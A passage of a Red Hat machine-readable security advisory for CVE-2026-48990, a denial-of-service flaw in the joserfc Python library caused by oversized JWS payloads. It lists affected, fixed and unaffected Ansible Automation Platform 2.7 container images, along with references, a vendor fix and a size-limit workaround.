"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2490168"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in joserfc, a Python library for JSON Object Signing and Encryption (JOSE). This vulnerability allows a remote attacker to cause resource exhaustion, leading to a Denial of Service (DoS), by sending oversized JSON Web Signature (JWS) payloads. The library fails to apply size limits, specifically JWSRegistry.max_payload_length, when processing RFC7797 b64=false JWS payloads.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "RHBZ#2490168",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490168"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990"
},
{
"category": "external",
"summary": "https://github.com/authlib/joserfc/releases/tag/1.6.7",
"url": "https://github.com/authlib/joserfc/releases/tag/1.6.7"
},
{
"category": "external",
"summary": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5",
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
}
],
"release_date": "2026-06-17T21:08:10.534000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "The risk can be mitigated by rejecting oversized serialized JWS inputs before they reach joserfc and enforcing strict request/body size limits at the application or reverse-proxy layer.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
